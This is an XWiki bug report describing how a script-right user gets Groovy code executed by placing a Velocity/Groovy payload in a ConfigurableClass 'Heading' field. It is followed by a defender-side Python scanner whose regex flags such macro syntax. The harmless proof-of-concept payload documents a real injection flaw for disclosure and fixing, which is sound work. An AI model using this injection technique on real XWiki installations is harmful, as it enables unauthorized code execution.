Details
- Bug
- Resolution: Fixed
- Critical
- 2.3
- Unit
- Unknown
- N/A
- N/A
Description
Steps to reproduce:
- Login as a user with script right.
- Edit your user profile (or any other editable page) and add an object of type "XWiki.ConfigurableClass" ("Custom configurable sections").
- Set "Display in section" to "other".
- Set "Heading" to
#set($codeToExecute = 'Test') #set($codeToExecuteResult = '{{async}}{{groovy}}services.logging.getLogger("attacker").error("Attack from Heading succeeded!"); println("Hello from Groovy!"){{/groovy}}{{/async}}') My Heading $app.getRenderedContent('{{groovy}}println("Hello from rendered content!"){{/groovy}}', 'xwiki/2.1')
- Set "Display in Category" to "other".
- Set "Scope" to "Wiki and all spaces".
- Click "Save".
- Open <xwiki-host>/xwiki/bin/view/Main/?sheet=XWiki.AdminSheet&viewer=content&editor=globaladmin&section=other where <xwiki-host> is the URL of your XWiki installation.
Expected result:
No error is logged; instead an error is displayed for the heading stating that Groovy execution isn't allowed.
Actual result:
"My Heading <p>Hello from rendered content!</p>" is displayed as the heading, the content below says "Hello from Groovy!", and a log message "Attack from Heading succeeded!" is written. This shows that the Groovy code has been executed. Note that this is with all fixes from XWIKI-21121 applied; before that, no script right was necessary.
This issue exploits XWIKI-21192 and might be fixed once XWIKI-21192 is fixed, but it could also be fixed independently by executing the heading's Velocity code more securely.
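As an added defender-side example (not part of this issue or of XWiki's own code), the following Python script scans an XWiki page export for XWiki.ConfigurableClass objects whose "Heading" property carries macro or Velocity syntax, which a plain-text heading never needs. The XML layout (`<object>`, `<className>`, `<property>/<heading>`) is assumed to follow the XAR page format, and the sample document is constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# A ConfigurableClass heading is meant to be plain text, so wiki macros,
# Velocity directives or nested rendering calls inside it are suspicious.
SUSPICIOUS = re.compile(
    r"\{\{\s*(groovy|velocity|python|async|html)\b"  # script / async macros
    r"|#set\s*\("                                    # Velocity assignment
    r"|\$\w+\.getRenderedContent\s*\(",              # nested rendering call
    re.IGNORECASE,
)

# Constructed sample in the assumed XAR page-export layout: one benign
# section object and one whose heading carries macro syntax.
SAMPLE_XML = """<xwikidoc>
  <object>
    <className>XWiki.ConfigurableClass</className>
    <number>0</number>
    <property><heading>Mail settings</heading></property>
    <property><displayInSection>other</displayInSection></property>
  </object>
  <object>
    <className>XWiki.ConfigurableClass</className>
    <number>1</number>
    <property><heading>#set($x = 'Test') My Heading {{async}}{{groovy}}println("x"){{/groovy}}{{/async}}</heading></property>
    <property><displayInSection>other</displayInSection></property>
  </object>
</xwikidoc>"""


def find_scripted_headings(page_xml: str) -> list[tuple[int, str]]:
    """Return (object number, heading) for every ConfigurableClass object
    whose heading contains macro or Velocity syntax."""
    root = ET.fromstring(page_xml)
    hits = []
    for obj in root.iter("object"):
        if obj.findtext("className") != "XWiki.ConfigurableClass":
            continue
        heading = obj.findtext("property/heading") or ""
        if SUSPICIOUS.search(heading):
            hits.append((int(obj.findtext("number", "-1")), heading))
    return hits


if __name__ == "__main__":
    for number, heading in find_scripted_headings(SAMPLE_XML):
        print(f"object #{number}: suspicious heading {heading!r}")
```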